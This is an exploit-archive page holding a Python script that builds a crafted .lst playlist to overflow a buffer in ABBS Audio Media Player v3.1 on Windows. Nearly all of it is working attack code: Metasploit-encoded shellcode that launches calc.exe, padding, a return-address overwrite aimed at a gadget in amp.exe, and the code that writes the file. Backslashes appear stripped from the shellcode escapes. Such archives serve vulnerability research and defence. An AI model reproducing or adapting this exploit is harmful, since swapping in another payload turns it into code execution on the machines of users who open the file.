[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ABBS Audio Media Player v3.1 (.lst) Buffer Overflow
# Published : 2013-05-04
# Author :
# Previous Title : AudioCoder .M3U Buffer Overflow
# Next Title : AudioCoder 0.8.18 - Buffer Overflow Exploit (SEH)
#!/usr/bin/python
# Exploit Title: ABBS Audio Media Player v3.1 (.lst) Buffer Overflow
# Version: v3.1
# Date: 2013-05-04
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.inshell.net
# Software Link: http://abbs.qsnx.net/
# Tested on: Windows XP SP3 DE
# Windows 7 SP1 64Bit DE
# Windows 8 32/64Bit DE/EN
# Notes: This exploit is for the current version and WinALL.
# Howto: Open .lst
from struct import pack
file="exploit.lst"
# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00x0ax0d'
shellcode = ("xdaxcaxbbxfdx11xa3xaexd9x74x24xf4x5ax31xc9" +
"xb1x33x31x5ax17x83xc2x04x03xa7x02x41x5bxab" +
"xcdx0cxa4x53x0ex6fx2cxb6x3fxbdx4axb3x12x71" +
"x18x91x9exfax4cx01x14x8ex58x26x9dx25xbfx09" +
"x1ex88x7fxc5xdcx8ax03x17x31x6dx3dxd8x44x6c" +
"x7ax04xa6x3cxd3x43x15xd1x50x11xa6xd0xb6x1e" +
"x96xaaxb3xe0x63x01xbdx30xdbx1exf5xa8x57x78" +
"x26xc9xb4x9ax1ax80xb1x69xe8x13x10xa0x11x22" +
"x5cx6fx2cx8bx51x71x68x2bx8ax04x82x48x37x1f" +
"x51x33xe3xaax44x93x60x0cxadx22xa4xcbx26x28" +
"x01x9fx61x2cx94x4cx1ax48x1dx73xcdxd9x65x50" +
"xc9x82x3exf9x48x6ex90x06x8axd6x4dxa3xc0xf4" +
"x9axd5x8ax92x5dx57xb1xdbx5ex67xbax4bx37x56" +
"x31x04x40x67x90x61xbex2dxb9xc3x57xe8x2bx56" +
"x3ax0bx86x94x43x88x23x64xb0x90x41x61xfcx16" +
"xb9x1bx6dxf3xbdx88x8exd6xddx4fx1dxbax0fxea" +
"xa5x59x50")
junk1="x90" * (4108 - len(shellcode))
eip=pack('<L',0x00412c91) # ADD ESP,14 # POP EDI # POP ESI # POP EBX # RETN ** [amp.exe] **
junk2="x90" * 4
evil="x00" * 4 # Terminat0r
poc=junk1 + shellcode + eip + junk2 + evil
try:
print "[*] Creating exploit file...n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";